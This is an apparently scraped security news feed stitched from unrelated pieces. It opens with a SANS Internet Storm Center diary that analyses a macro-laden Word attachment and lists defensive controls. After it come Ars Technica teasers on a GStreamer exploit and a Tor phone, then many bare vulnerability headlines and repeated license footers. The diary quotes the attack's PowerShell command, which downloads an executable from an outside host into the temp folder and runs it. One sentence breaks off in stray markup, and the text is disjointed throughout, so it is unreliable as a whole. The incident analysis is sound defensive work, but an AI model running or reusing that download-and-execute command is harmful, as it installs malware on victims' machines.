Recently weve seen lots of malicious documents make it through our first protection layers. (https://www.virustotal.com/en/file/79ff976c5ca6025f3bb90ddfa7298286217c21309c897e6b530603d48dea0369/analysis/) . In the last week, these emails have a word document that spawns a command shell that kicks off a PowerShell script. When working incidents, it is important to map out the attacker lifecycle to determine where to improve your defenses.

In this case the execution chain looks like this: Email -Word Doc - Cmd.exe -powershell -Malware.exe


When the user clicks on the attachment it runs a macro that then kicks off a command shell that runs the following:
cmd /c PowerShell (New-Object System.Net.WebClient).DownloadFile(http://www.tessaban.com/images/images/gfjfgklmslifdsfnln.png,%TMP%\scsnsys.exeStart-process %TMP%\scsnsys.exe


When looking at how PowerShell makes the web connection, nothing special happens on the network. Powershell doesn">

So lets map out controls we can put in place to prevent the attack lifecycle.

  1. Stopping delivery of the message (In order of $ and Complexity)
    1. Hold attachment for X number of hours so AV my catch up
    2. Convert file to another type (e.g. Word - PDF)
    3. Mangle the macro in the file before delivery
    4. Sandbox the attachment before delivery
    5. Preventing Macros from running
  2. Disable macros via GPO
  3. Block users from Cmd.exe
    1. Use an Applocker policy to block cmd.exe
  4. Prevent Powershell from running unsigned scripts
    1. Lots of ways to bypass
  5. Prevent download of malware
    1. Use sinkhole/proxy ect.
  6. Prevent malware from running in the drop location ( C:\Users\me\AppData\Local\Temp\scsnsys.exe)
    1. Applocker


Now by looking at this list you can determine what make sense in your environment due to technical or political issues. This exercise will have you prepared to answer the questions, how can we prevent this in the future. I also like to add a simple level of effort required to implement these changes (e.g. ~10hrs) and costs (e.g. $$$).

--

Tom Webb

@twsecblog

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

--

Tom Webb

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Enlarge / A screenshot showing an exploit that takes full control of a fully updated version of Fedora. (credit: Chris Evans)

Recently released exploit code makes people running fully patched versions of Fedora and other Linux distributions vulnerable to drive-by attacks that can install keyloggers, backdoors, and other types of malware, a security researcher says.

One of the exploits—which targets a memory corruption vulnerability in the GStreamer framework that by default ships with many mainstream Linux distributions—is also noteworthy for its elegance. To wit: it uses a rarely seen approach to defeat address space layout randomization and data execution prevention, which are two of the security protections built in to Linux to make software exploits harder to carry out. ASLR randomizes the locations in computer memory where software loads specific chunks of code. As a result, code that exploits existing flaws often results in a simple computer crash rather than a catastrophic system compromise. Meanwhile, DEP, which is often referred to as NX or No-Execute, blocks the execution of code that such exploits load into memory. (Ars Technology Editor Peter Bright has much more about ASLR and DEP here.)

Unlike most ASLR and DEP bypasses, the one folded into the GStreamer exploit doesn't rely on code to manipulate the memory layout or other environmental variables. Instead, it painstakingly arranges the bytes of code in a way that completely disables the protections. And by eliminating the need for JavaScript or other memory-massaging code to execute on a targeted computer, it's possible to carry out attacks that otherwise wouldn't be possible. Chris Evans, the security researcher who developed the exploit, describes the challenge as "a real beast."

Read 6 remaining paragraphs | Comments

 
Neovim CVE-2016-1248 Command Execution Vulnerability
 
Xen CVE-2016-9381 Privilege Escalation Vulnerability
 
Linux Kernel Out-Of-Bounds Read Information Disclosure Vulnerability
 
Xen Multiple Denial of Service Vulnerabilities
 
Xen PyGrub Multiple Privilege Escalation Vulnerabilities
 
Xen CVE-2016-9384 Information Disclosure Vulnerability
 
Xen CVE-2016-9383 Memory Corruption Vulnerability
 
TYPO3 Suggest Wizard Remote Security Bypass Vulnerability
 

Thanks to your help, we found an application that will display a ZIP comment by default: WinRAR.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com
NVISO

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
[CORE-2016-0007] - TP-LINK TDDP Multiple Vulnerabilities
 

Enlarge (credit: Mission Impossible)

The Tor Project recently announced the release of its prototype for a Tor-enabled smartphone—an Android phone beefed up with privacy and security in mind, and intended as equal parts opsec kung fu and a gauntlet to Google.

The new phone, designed by Tor developer Mike Perry, is based on Copperhead OS, the hardened Android distribution profiled first by Ars earlier this year.

"The prototype is meant to show a possible direction for Tor on mobile," Perry wrote in a blog post. "We are trying to demonstrate that it is possible to build a phone that respects user choice and freedom, vastly reduces vulnerability surface, and sets a direction for the ecosystem with respect to how to meet the needs of high-security users."

Read 28 remaining paragraphs | Comments

 
Poppler CVE-2015-8868 Heap Buffer Overflow Vulnerability
 
Expat CVE-2016-4472 Incomplete Fix Remote Code Execution Vulnerability
 
Google Android Multiple Kernel Components Multiple Information Disclosure Vulnerabilites
 
Linux Kernel 'sound/core/timer.c' Local Information Disclosure Vulnerability
 
Linux Kernel CVE-2016-4578 Multiple Local Information Disclosure Vulnerabilities
 
Linux Kernel CVE-2016-1583 Stack-Based Buffer Overflow Vulnerability
 

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Quagga Routing Software Suite CVE-2016-4049 Denial Of Service Vulnerability
 
Microsoft Windows Kernel 'Win32k.sys' CVE-2016-7255 Local Privilege Escalation Vulnerability
 
LibTIFF 'tools/tiffcrop.c' Multiple Heap Buffer Overflow Vulnerabilities
 
PHP CVE-2016-7418 Out-of-Bounds Read Denial of Service Vulnerability
 
PHP CVE-2016-7413 Use After Free Denial of Service Vulnerability
 
CVE-2015-0050: Microsoft Internet Explorer 8 MSHTML SRunPointer::SpanQualifier/RunType OOB read details
 
Mozilla Firefox Multiple Security Vulnerabilities
 
Moodle CVE-2016-8643 Security Bypass Vulnerability
 
Moodle CVE-2016-8644 Information Disclosure Vulnerability
 
Moodle MSA-16-0026 Information Disclosure Vulnerability
 
Xen CVE-2016-3159 Information Disclosure Vulnerability
 
QEMU 'stellaris_enet_receive()' Function Remote Buffer Overflow Vulnerability
 
Xen CVE-2016-3158 Information Disclosure Vulnerability
 
Internet Storm Center Infocon Status